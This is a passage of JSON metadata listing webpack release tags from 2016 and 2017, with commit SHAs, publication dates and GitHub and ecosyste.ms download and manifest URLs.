rl":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.